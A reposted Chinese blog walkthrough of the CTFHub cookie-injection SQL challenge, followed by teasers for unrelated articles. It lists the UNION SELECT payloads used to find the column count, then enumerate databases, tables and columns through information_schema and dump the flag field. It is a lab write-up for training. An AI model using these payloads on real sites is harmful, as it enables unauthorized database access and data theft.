CTFHUB-SQL注入-Cookie注入

CTFHUB-SQL注入-Cookie注入

pingmian/2025/4/3 15:59:50/文章来源:https://blog.csdn.net/weixin_68416970/article/details/139442362

由于本关是cookie注入，就不浪费时间判断注入了，在该页面使用 burp工具抓包，修改cookie后面，加上SQL语句，关掉burp抓包，就可以在题目页面显示结果了

判断字段数量

发现字段数量是2列

使用id=-1 union select 1,2 判断回显

回显位置是第一二列

查询数据库名

union select 1,database()

查询所有数据库名

union select 1,group_concat(schema_name)from information_schema.schemata

查询数据库中的表名

union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'

发现了2个表

查询表中字段名

union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='jhyppjlnjp'

查询字段下的数据

union select 1,group_concat(txpyjbpxlj) from sqli.jhyppjlnjp

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/pingmian/26631.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

相关文章

君子签帮助物流组织打造线上签约平台，助力简化成本，高效运转

君子签帮助物流组织打造线上签约平台，助力简化成本，高效运转

各类物流组织日常业务可能涉及“企业入驻、快递、整车运输、货运、仓储、供应链等”多种类型，各个环节都存在大量的文件/单据签署，网点、客户、司机、收货人遍布全国各地，复杂的签署需求，以及庞大的签字、用印需求，让各…

阅读更多...

MySQL 搭建主从报错 1236

MySQL 搭建主从报错 1236

错误信息： Last_IO_Error: Got fatal error 1236 from source when reading data from binary log: Could not find first log file name in binary log index file 大致内容： MySQL 在尝试从二进制日志（binary log）中读取数据…

阅读更多...

数据通信与网络

数据通信与网络

计算机网络的组成计算机网络是由计算机系统、网络节点和通信链路等组成的系统。逻辑上分为资源子网和通信子网。 CCP：communication control processor 通信控制处理机，网络节点，交换机、路由器等设备。逻辑组成： &#xf…

阅读更多...

数据结构——02-算数表达式-栈-实验题目分享

数据结构——02-算数表达式-栈-实验题目分享

一、实验题目算数表达式计算： 设计算法根据用户输入的合法表达式计算结果并显示出来表达式中的符号为、-、*、/、（、） 表达式中数字为整数二、实验环境 Windows 11 Visual Studio Code （总体代码在最后） 三…

阅读更多...

编程入门费用：揭开学习成本的神秘面纱

编程入门费用：揭开学习成本的神秘面纱

编程入门费用：揭开学习成本的神秘面纱编程，这一曾被视为专业领域的技能，如今已逐渐走入大众视野。越来越多的人开始尝试学习编程，然而，对于初学者来说，编程入门费用无疑是一个重要的考虑因素。那么&#…

阅读更多...

论文笔记：ATime-Aware Trajectory Embedding Model for Next-Location Recommendation

论文笔记：ATime-Aware Trajectory Embedding Model for Next-Location Recommendation

Knowledge and Information Systems, 2018 1 intro 1.1 背景随着基于位置的社交网络（LBSNs），如Foursquare和Facebook Places的日益流行，大量用户签到数据变得可用这些大量签到数据的可用性带来了许多有用的应用，以…

阅读更多...

kotlin类型检测与类型转换

kotlin类型检测与类型转换

一、is与!is操作符 1、使用 is 操作符或其否定形式 !is 在运行时检测对象是否符合给定类型。 fun main() {var a "1"if(a is String) {println("a是字符串类型:${a.length}")}// 或val b a is Stringprintln(b) } 二、"不安全的"转换操作符…

阅读更多...

【面试手撕】CAS实现线程安全的链表结构的栈

【面试手撕】CAS实现线程安全的链表结构的栈

利用Atomic原子引用，采用CAS的方式，实现线程安全的链表栈的实现关键点关键在于用 AtomicReference原子类包装栈顶节点，在更改新的栈顶节点的时候，判断原子引用的栈顶是否还是之前获取时的栈顶，如果不是则重新通过Ato…

阅读更多...

搜索是门艺术，大神都是这样找资源

搜索是门艺术，大神都是这样找资源

以下所有资源均可在星云导航找到，网站地址：https://www.xygalaxy.com/ 浏览器搜索高级用法 1、排除干扰，指定关键词 1.1、排除指定关键字格式：关键字1 -关键字2比如搜索：星云导航，不想要CSDN的内容星…

阅读更多...

Stable Diffusion 3 开源发布可下载体验

Stable Diffusion 3 开源发布可下载体验

本文来自huggingface翻译 Stable Diffusion 3 Medium是一种多模态扩散变换器 (MMDiT) 文本到图像模型，其在图像质量、排版、复杂提示理解和资源效率方面的性能有极大提升。有关更多技术细节，请参阅研究论文。请注意：此模型是根据 Stabilit…

阅读更多...

C# —— 条件运算符

C# —— 条件运算符

条件运算符的作用: 用于比较两个变量或者常量 // > // < // // ! // > // < 条件运算符一定存在左右两边的内容左边内容条件运算符右边内容 int a 30; int b 50; 条件运算符不…

阅读更多...

java面试题：hashMap扩容机制

java面试题：hashMap扩容机制

初始容量和加载因子： HashMap在初始化时有一个默认的初始容量（capacity），通常是16。这个容量也可以在创建HashMap时通过构造函数指定。 HashMap还有一个加载因子（load factor），这是一个表示Has…

阅读更多...

【全开源】快递寄件小程序源码（FastAdmin+ThinkPHP+原生微信小程序）

【全开源】快递寄件小程序源码（FastAdmin+ThinkPHP+原生微信小程序）

📦快递寄件小程序：轻松寄送，便捷生活 🚚一、引言：告别繁琐，让寄件更简单在繁忙的生活中，寄送快递往往成为我们的一大难题。传统的寄件方式需要前往快递公司网点，填写繁琐的寄件信…

阅读更多...

单目标应用：基于蛇鹫优化算法SBOA的微电网优化（MATLAB代码）

单目标应用：基于蛇鹫优化算法SBOA的微电网优化（MATLAB代码）

一、微电网模型介绍微电网多目标优化调度模型简介_vmgpqv-CSDN博客参考文献： [1]李兴莘,张靖,何宇,等.基于改进粒子群算法的微电网多目标优化调度[J].电力科学与工程, 2021, 37(3):7 二、蛇鹫优化算法求解微电网 2.1算法简介蛇鹫优化算法（Secre…

阅读更多...

基于python多光谱遥感数据处理、图像分类、定量评估及机器学习

基于python多光谱遥感数据处理、图像分类、定量评估及机器学习

原文链接：基于python多光谱遥感数据处理、图像分类、定量评估及机器学习普通数码相机记录了红、绿、蓝三种波长的光，多光谱成像技术除了记录这三种波长光之外，还可以记录其他波长（例如：近红外、热红外等）光…

阅读更多...

企业中的绩效管理

企业中的绩效管理

背景企业中为何需要绩效管理，企业绩效管理为何比较难，这在企业管理中是非常难，同样也是非常有价值的命题，那么首先应该对这个命题有清晰的认知，特别是要想明白为何企业需要绩效管理，应该先明白企业。企…

阅读更多...

Uniapp实现页面滚动Tab吸顶，点击tab内容滚动到对应tab内容位置

Uniapp实现页面滚动Tab吸顶，点击tab内容滚动到对应tab内容位置

1.template结构 <view class"content-tabs-box"><view class"content-tabs" :class"{is-fixed: isTabFixed}"><viewv-for"(item, index) in detailTabs" :key"index" class"tab" :class"{act…

阅读更多...

【git使用四】git分支理解与操作（详解）

【git使用四】git分支理解与操作（详解）

目录 （1）理解git分支主分支（主线） 功能分支主线和分支关系将分支合并到主分支快速合并非快速合并 git代码管理流程 （2）理解git提交对象提交对象与commitID Git如何保存数据示例讲解 &a…

阅读更多...

lnmp的介绍与源码部署以及 |什么是正向、反向、透明代理 | 常见的集群有哪些

lnmp的介绍与源码部署以及 |什么是正向、反向、透明代理 | 常见的集群有哪些

lnmp 文章目录 lnmp1.LNMP是什么2. lnmp简介3.系统特点4.优点5.lnmp部署5.1 nginx安装5.2 mysql安装5.3 php安装5.4配置nginx服务处理php 6.扩展知识点1.什么是集群2.常见的集群有哪些集群的分类1、高可用集群2、负载均衡集群3、分布式计算集群4、高性能集群(High Performance …

阅读更多...

TCP标志

TCP标志

SYN (Synchronize) 和 ACK (Acknowledgement) 是TCP协议中的两种重要标志（flags），用于建立和维护连接。它们通常在TCP三次握手过程中使用。 1、SYN标志： 当客户端想要建立于服务器的TCP连接时，它会发送一个带有SYN白…

阅读更多...

最新文章